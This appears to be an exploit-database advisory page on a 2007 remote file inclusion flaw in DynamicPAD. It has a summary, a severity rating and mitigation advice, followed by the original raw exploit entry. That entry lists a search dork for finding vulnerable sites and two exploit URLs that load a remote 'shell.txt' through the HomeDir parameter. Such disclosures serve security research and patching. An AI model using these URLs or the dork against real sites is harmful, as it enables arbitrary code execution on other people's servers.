header-logo
Suggest Exploit
vendor:
DynamicPAD
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote file inclusion
CWE
Product Name: DynamicPAD
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

DynamicPAD Remote file inclusion (HomeDir)

The DynamicPAD software is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by manipulating the 'HomeDir' parameter in the 'dp_logs.php' and 'index.php' files. By including a malicious file, the attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security patches and updates for the DynamicPAD software. Additionally, input validation and sanitization should be implemented to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

#DynamicPAD Remote file inclusion (HomeDir)

#Download script : http://dynamicpad.org/dp.tar.gz

#Thanks Str0ke

#Dork : "Powered By DynamicPAD"

#Exploit :

#http://victim.com/[dp_path]/dp_logs.php?HomeDir=shell.txt?

#http://victom.com/[dp_path]/index.php?HomeDir= shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger[at]Hotmail[dot]com

# milw0rm.com [2007-05-07]

Navigation

Suggest Exploit

Services By CQR